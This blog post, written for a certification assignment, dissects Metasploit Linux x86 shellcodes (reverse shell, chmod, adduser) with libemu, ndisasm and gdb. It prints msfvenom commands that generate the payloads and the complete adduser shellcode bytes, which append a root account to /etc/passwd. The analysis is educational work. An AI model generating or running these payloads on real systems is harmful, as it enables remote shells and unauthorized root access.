In this post I will discuss how to understand the logic and structure of a piece of shellcode. For that I will use libemu, ndisasm, and gdb. libemu is an x86 shellcode emulation framework that helps you understand shellcode logic faster. ndisasm is a disassembler that ships as part of the nasm package on Kali. And gdb is the venerable GNU Debugger, arguably the best debugger for Linux if you prefer the command line.

To generate payloads I will use the Metasploit Framework (MSF). Instead of the msfpayload tool, which was used in the past and has recently been phased out, I will use its replacement, msfvenom.

Installation of libemu

When I set out to install libemu, I expected to find it in the Kali repositories, but alas it wasn't there. After googling a bit, I found that most of the links led to the libemu.carnivore.it page, which was down at the time of this writing. So I had to find its source code elsewhere on GitHub and fork it. With the source code in hand, I followed this guide on libemu installation and successfully installed it on my system:

# The only dependency I had to satisfy on my Kali machine
apt-get install libtool
cd ~/Downloads

# Cloning the source code from my GitHub repo
git clone --depth=1 https://github.com/reider-roque/libemu
cd libemu

# Building and installing libemu
autoreconf -i -v
./configure --prefix=/opt/libemu
make install

Example #1: Reverse shell

With the following command we will first see what Linux x86 payloads are available:

msfvenom --list payloads | grep linux/x86

Output (truncated):

linux/x86/adduser                         Create a new user with UID 0
linux/x86/chmod                           Runs chmod on specified file with specified mode
linux/x86/exec                            Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp       Inject the meterpreter server payload (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid  Inject the meterpreter server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp       Inject the meterpreter server payload (staged). Listen for a connection
linux/x86/meterpreter/bind_tcp            Inject the meterpreter server payload (staged). Listen for a connection (Linux x86)
...

As you can see, most of the available payloads spawn either reverse or bind shells. By the way, that is where the name comes from: shellcode is a sequence of machine instructions that is most often used in exploits to spawn a shell, often an administrative one.

For the first example I will dissect the reverse shell payload. Let's first see whether this payload has any mandatory options (output is truncated for brevity):

msfvenom -p linux/x86/shell_reverse_tcp --payload-options

Output:

Options for payload/linux/x86/shell_reverse_tcp:
...
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
...

From the output above we can see that there are two required options, one of which has no default value. So for the payload to work properly we can leave LPORT at its default, but we need to supply LHOST.

Below I pipe the generated payload into sctest, a binary that comes with the libemu framework, which analyzes the code and tries to reconstruct a high-level structure of the shellcode:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.1.1.1 -f raw | /opt/libemu/bin/sctest -vvv -S -s 100000 -G tmp.dot

The -vvv option increases the verbosity of sctest. The -S option tells it to read input from stdin. The -s option sets the maximum number of instructions to execute and defaults to 1, which means sctest would emulate only the first instruction of the supplied shellcode. To make sure that every shellcode instruction is executed, it is usually set to some large number, like 100000.

Top of the sctest output

At the top of the output you can see how sctest steps through the shellcode instruction by instruction and shows the state of the registers after each one. At the bottom of the output you will find the reconstructed high-level view of what's going on:

int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 16843135 (host=127.1.1.1);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

At first glance I thought that sctest had reconstructed the whole program in C, but I quickly realized that it is just C-like syntax. Nevertheless, the job sctest did here is amazing.

From the output above you can tell that the shellcode first creates a socket with the socket() function. Then it redirects the process's standard error, output, and input to that socket with three calls to dup2(). After that, it initiates a connection to the 127.1.1.1 address on port 4444 using connect(), just as we wanted it to. And finally it spawns the /bin/sh shell using execve().

As you can see, using sctest we were able to understand what the shellcode does without even disassembling it. But this is not always the case. Let's take a look at the next example.
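
The sin_port and s_addr numbers in the connect() block look odd because sctest prints the fields as plain little-endian integers, while the values in parentheses are the network-byte-order interpretation. A minimal Python sketch of that conversion follows; the function names are hypothetical and not part of libemu:

```python
import socket
import struct


def decode_port(raw: int) -> int:
    """Reinterpret a 16-bit value read little-endian as a network-order port."""
    return struct.unpack(">H", struct.pack("<H", raw))[0]


def decode_host(raw: int) -> str:
    """Reinterpret a 32-bit value read little-endian as a dotted IPv4 address."""
    return socket.inet_ntoa(struct.pack("<I", raw))


if __name__ == "__main__":
    print(decode_port(23569))     # sin_port value from the sctest output
    print(decode_host(16843135))  # s_addr value from the sctest output
```

The byte swap is done with struct rather than socket.ntohs() so that the result does not depend on the byte order of the machine running the script.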

Example #2: Chmod

As in the previous example, I will pipe the generated shellcode into sctest. This time it will be the chmod payload. All it does is change the Unix permissions on a file to, by default, 0666.

msfvenom -p linux/x86/chmod FILE=tmp.bin -f raw | /opt/libemu/bin/sctest -vvv -S -s 100000 -G tmp.dot

The -G option supplied to sctest writes a graph of the shellcode logic in the dot file format, which can then be converted into an image using the dot utility. Looking at the depicted flow sometimes gives a better understanding of what's happening, especially when the shellcode makes extensive use of loops and branching.

After running the above command the high level output I got was this:

ERROR  chmod (
) =  -1;
ERROR  exit (
     int status = 4288522;
) =  -1;

Looking at it I could tell that the shellcode probably called the chmod() and exit() functions, but which parameters were passed to chmod() was not clear. Let's take a look at the graph converted from the dot to the png file format:

dot -Tpng -o tmp.png tmp.dot && eog tmp.png

Chmod shellcode call graph

On the call graph we can again see that sctest caught the calls to the chmod() and exit() functions. We can also see that the second argument to the chmod system call (the ECX register) is set to 0x1b6, which, as we can confirm on the Linux command line with the command

printf "%o\n" 0x1b6

translates into 666 in octal, the default permissions used by the shellcode.
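
The same check can be sketched in Python, which can also render the mode the way ls would display it. This assumes the target is a regular file, and the helper name is hypothetical:

```python
import stat


def describe_mode(mode: int) -> str:
    """Return the octal form and the ls-style string for a permission mode."""
    # S_IFREG marks a regular file so that filemode() prints a leading '-'.
    return f"{mode:o} {stat.filemode(stat.S_IFREG | mode)}"


if __name__ == "__main__":
    print(describe_mode(0x1B6))  # value of ECX seen on the call graph
```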

Next, the call-pop instruction sequence suggests that the first argument to chmod() is set using the call-pop technique, a variation of the venerable jmp-call-pop technique in which the data sits between the call instruction and its destination. The fact that the graph shows a relative address of 0x1 as the call destination is odd, and we would have to use ndisasm and gdb to understand why. I will leave that exercise for a similar problem in the last example below.

Also note that the above shellcode contains null bytes. That is because msfvenom does not avoid bad characters unless you tell it to. And although I do not encode payloads in my examples here, note that sctest can work its way through encoded shellcode just as well.

Example #3: Adduser

In this example I want to zero in on a case where sctest is mostly useless and some work with gdb is needed to fully understand the shellcode.

After running the following command, you will see that sctest is not able to generate a high-level view of the shellcode logic, and even the tmp.dot call graph is empty:

msfvenom -p linux/x86/adduser -f raw | /opt/libemu/bin/sctest -vvv -S -s 100000 -G tmp.dot

Let's try a different approach and disassemble the shellcode with ndisasm:

msfvenom -p linux/x86/adduser -f raw > tmp.bin && ndisasm -b32 tmp.bin

Below is the output of the above command with my comments. I truncated the "gibberish" part to save some space.

00000000  31C9              xor ecx,ecx # zero out ECX and EBX
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46 # load EAX with 0x46, corresponding
00000006  58                pop eax     # to setreuid syscall #
00000007  CD80              int 0x80
00000009  6A05              push byte +0x5  # load EAX with open syscall #
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx 
0000000E  51                push ecx        # push some nulls to the stack
0000000F  6873737764        push dword 0x64777373       # pushing /etc//passwd
00000014  682F2F7061        push dword 0x61702f2f       # string to the stack
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx     # ECX is now = 1
00000021  B504              mov ch,0x4      # ECX is now = 1025, or 2001 in octal
00000023  CD80              int 0x80
00000025  93                xchg eax,ebx
00000026  E828000000        call dword 0x53
0000002B  6D                insd            # gibberish begins
0000002C  657461            gs jz 0x90
......................................
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld         # gibberish ends
00000057  6A04              push byte +0x4  # load EAX with write syscall #
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1  # load EAX with exit syscall #
0000005E  58                pop eax
0000005F  CD80              int 0x80

Looking at the above disassembly and my comments, you can tell that the shellcode:

Sets real and effective UID to 0 (gets root privileges)
Opens /etc/passwd file
Writes something into it, and
Exits
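
The comments in the disassembly claim that the three push dword instructions leave the string /etc//passwd on the stack. A short Python sketch to check that claim, assuming 32-bit little-endian pushes (the function name is hypothetical):

```python
import struct
from typing import Sequence


def stack_string(pushed: Sequence[int]) -> bytes:
    """Rebuild the bytes left on the stack by a series of 32-bit pushes.

    `pushed` lists the immediates in the order the push instructions run.
    The stack grows downward, so the last value pushed sits at the lowest
    address and is therefore read first.
    """
    return b"".join(struct.pack("<I", value) for value in reversed(pushed))


if __name__ == "__main__":
    # Immediates from offsets 0x0F, 0x14 and 0x19 of the ndisasm listing.
    print(stack_string([0x64777373, 0x61702F2F, 0x6374652F]))
```

The doubled slash pads the path to a multiple of four bytes, so it fits exactly into three pushes, and the null dword pushed just before it (push ecx) terminates the string.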

Knowing that the shellcode adds a user named metasploit with the same password, it is not difficult to guess what is written to /etc/passwd. With that knowledge I actually ran the shellcode and, sure enough, found the string metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh appended as the last line of the file.

To decipher the syscall numbers I used the /usr/include/i386-linux-gnu/asm/unistd_32.h file, where the Linux x86 system calls are defined.
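
The lookup can also be scripted. The sketch below parses lines in the style of unistd_32.h and maps the EAX values from the disassembly to syscall names. The embedded excerpt contains only the four entries needed here, and the function name is hypothetical:

```python
import re

# Excerpt in the style of unistd_32.h, limited to the entries used here.
UNISTD_EXCERPT = """
#define __NR_exit 1
#define __NR_write 4
#define __NR_open 5
#define __NR_setreuid 70
"""


def parse_syscalls(header_text: str) -> dict:
    """Map syscall numbers to names from '#define __NR_name number' lines."""
    pattern = re.compile(r"^#define\s+__NR_(\w+)\s+(\d+)\s*$", re.MULTILINE)
    return {int(num): name for name, num in pattern.findall(header_text)}


if __name__ == "__main__":
    table = parse_syscalls(UNISTD_EXCERPT)
    for eax in (0x46, 0x5, 0x4, 0x1):  # EAX values loaded before each int 0x80
        print(hex(eax), table[eax])
```

To run it against the real header, the contents of the file mentioned above could be passed to parse_syscalls() in place of the excerpt.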

The octal number 2001 loaded into ECX represents the file access mode flags. To understand what it means I looked into the /usr/include/asm-generic/fcntl.h file, where the open() flags are defined. 2001 is a combination of the O_WRONLY (01) and O_APPEND (02000) flags, which makes perfect sense for what the shellcode does.
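
How ECX ends up holding that value can be replayed step by step. The sketch below mimics the three instructions that build the flags and compares the result against the two constants. The flag values are hard-coded from the header named above, so the result does not depend on the platform running the script:

```python
# Flag values as defined in asm-generic/fcntl.h (octal), hard-coded on
# purpose instead of being taken from the host's os module.
O_WRONLY = 0o1
O_APPEND = 0o2000


def ecx_after_setup() -> int:
    """Replay 'xor ecx,ecx; inc ecx; mov ch,0x4' on a 32-bit register."""
    ecx = 0                                # xor ecx,ecx
    ecx = (ecx + 1) & 0xFFFFFFFF           # inc ecx    -> CL = 1
    ecx = (ecx & 0xFFFF00FF) | (0x4 << 8)  # mov ch,0x4 -> bits 8..15 = 4
    return ecx


if __name__ == "__main__":
    flags = ecx_after_setup()
    print(flags, oct(flags), flags == (O_WRONLY | O_APPEND))
```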

Now, the interesting part. Note that the call instruction jumps to address 0x53, but the disassembly shows no instruction starting at that address. There is an instruction at 0x52 and the next one at 0x55. This indicates that somewhere in the "gibberish" part a sequence of bytes confused the disassembler and its bytes-to-opcodes translation went out of alignment.

Note the sequence of bytes at address 0x52: 0A598B. The byte at offset 0x53, where the call instruction jumps, is 59. I will regenerate the payload in the C format, take the part starting at offset 0x53, and disassemble it to get the correct bytes-to-opcodes translation. For that I will use the scdisas script, which I created while going through the SLAE course materials.
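
The 0x53 destination can be verified from the raw bytes of the call instruction (E8 28 00 00 00 at offset 0x26). A minimal sketch, assuming a near call with a 32-bit relative displacement; the function name is hypothetical:

```python
import struct


def call_target(code: bytes, offset: int) -> int:
    """Return the destination of a near 'call rel32' (opcode E8) at offset."""
    if code[offset] != 0xE8:
        raise ValueError("no E8 call opcode at this offset")
    (rel32,) = struct.unpack_from("<i", code, offset + 1)
    # The displacement is relative to the end of the 5-byte instruction.
    return offset + 5 + rel32


if __name__ == "__main__":
    # Filler bytes place the call at the same offset as in the listing.
    code = b"\x90" * 0x26 + bytes.fromhex("e828000000")
    print(hex(call_target(code, 0x26)))
```

The call ends at 0x2B and the displacement is 0x28, so the destination is 0x2B + 0x28 = 0x53, which falls in the middle of the instruction that ndisasm decoded at 0x52.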

Producing shellcode in the format ready to be pasted into a C program:

msfvenom -p linux/x86/adduser -f c

Output (truncated):

...
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x28\x00\x00\x00\x6d\x65"
"\x74\x61\x73\x70\x6c\x6f\x69\x74\x3a\x41\x7a\x2f\x64\x49\x73"
"\x6a\x34\x70\x34\x49\x52\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a"
"\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58"
"\xcd\x80\x6a\x01\x58\xcd\x80";

Disassembling the shellcode starting from offset 0x53:

scdisas "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80"

Output:

00000000  59                pop ecx
00000001  8B51FC            mov edx,[ecx-0x4]
00000004  6A04              push byte +0x4
00000006  58                pop eax
00000007  CD80              int 0x80
00000009  6A01              push byte +0x1
0000000B  58                pop eax
0000000C  CD80              int 0x80
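
The scdisas script itself is not shown in this post. As a rough, hypothetical stand-in for its first step, the sketch below turns a C-style escaped string into raw bytes, which could then be written to a file and passed to ndisasm -b32. The function name and the approach are assumptions made for illustration, not the actual script:

```python
import re


def escaped_to_bytes(text: str) -> bytes:
    r"""Convert a string such as '\x59\x8b' (literal backslashes) to bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


if __name__ == "__main__":
    tail = escaped_to_bytes(
        r"\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80"
    )
    print(len(tail), tail.hex())
```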

In the above output you can see that the instruction to which call transfers execution is a pop instruction. That means that the shellcode employs the variation of the jmp-call-pop technique encountered in the previous example. So what I called "gibberish" is actually data, most likely a string, whose address gets loaded into the ECX register. By now we already know what string it is, but just to make sure, let's take a look at it in gdb.

To run the shellcode in gdb I'll save it in the ELF format. The ELF binary that msfvenom produces runs without any problems, but it is stripped of all symbols, which means that we can't set a breakpoint on the _start or main labels. To find the entry point we can use the readelf utility. One of the lines in its output points us to the address in question:
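
The data can also be pulled straight out of the shellcode bytes without a debugger. The sketch below slices out everything between the call and its destination, and mimics mov edx,[ecx-0x4] to show where the length passed to write comes from. The bytes are copied from the msfvenom -f c output above, and the function names are hypothetical:

```python
import struct

# Bytes copied from the msfvenom -f c output shown in this example.
SHELLCODE = (
    b"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
    b"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
    b"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x28\x00\x00\x00\x6d\x65"
    b"\x74\x61\x73\x70\x6c\x6f\x69\x74\x3a\x41\x7a\x2f\x64\x49\x73"
    b"\x6a\x34\x70\x34\x49\x52\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a"
    b"\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58"
    b"\xcd\x80\x6a\x01\x58\xcd\x80"
)

CALL_OFFSET = 0x26  # offset of the E8 call in the ndisasm listing


def embedded_data(code: bytes, call_offset: int) -> bytes:
    """Return the bytes between a 'call rel32' and its destination."""
    (rel32,) = struct.unpack_from("<i", code, call_offset + 1)
    start = call_offset + 5  # address pushed by call, later popped into ECX
    return code[start:start + rel32]


def length_seen_by_write(code: bytes, call_offset: int) -> int:
    """Mimic 'mov edx,[ecx-0x4]': read the dword just before the data."""
    ecx = call_offset + 5
    return struct.unpack_from("<I", code, ecx - 4)[0]


if __name__ == "__main__":
    print(embedded_data(SHELLCODE, CALL_OFFSET))
    print(length_seen_by_write(SHELLCODE, CALL_OFFSET))
```

The dword located just before the data is the displacement of the call itself, so the shellcode reuses it as the byte count for write instead of storing the length separately.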

msfvenom -p linux/x86/adduser -f elf > tmp.elf
chmod +x tmp.elf
readelf --headers tmp.elf

Output:

...
  Entry point address:               0x8048054
...

Below is the command sequence that gets us started with gdb:

gdb tmp.elf
(gdb) break *0x8048054
(gdb) run
(gdb) disas $eip,+45

Disassembly view in gdb

In the above picture you can see that the data starts at 0x0804807f, the address immediately following the call instruction. Running either of the following two commands, we can confirm that those 40 bytes of data are the string that, as we saw earlier, is written to the /etc/passwd file:

(gdb) x/40cb 0x0804807f
(gdb) x/s 0x0804807f

Checking string data in gdb
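
The address used in the gdb commands can be derived from the numbers already collected. A small sketch, assuming the shellcode starts exactly at the ELF entry point (the names are hypothetical):

```python
ENTRY_POINT = 0x8048054  # from the readelf output
CALL_OFFSET = 0x26       # offset of the call in the ndisasm listing
CALL_LENGTH = 5          # E8 opcode plus a 32-bit displacement
DATA_LENGTH = 0x28       # the call displacement, that is 40 bytes


def data_range(entry: int) -> tuple:
    """Return the start and end address of the data embedded after the call."""
    start = entry + CALL_OFFSET + CALL_LENGTH
    return start, start + DATA_LENGTH


if __name__ == "__main__":
    start, end = data_range(ENTRY_POINT)
    print(f"x/{DATA_LENGTH}cb {start:#x}")  # gdb command for the data bytes
    print(f"data ends before {end:#x}")
```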

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.

Oleg's Web Log

Dissecting msfvenom shellcodes (SLAE, Assignment #5)
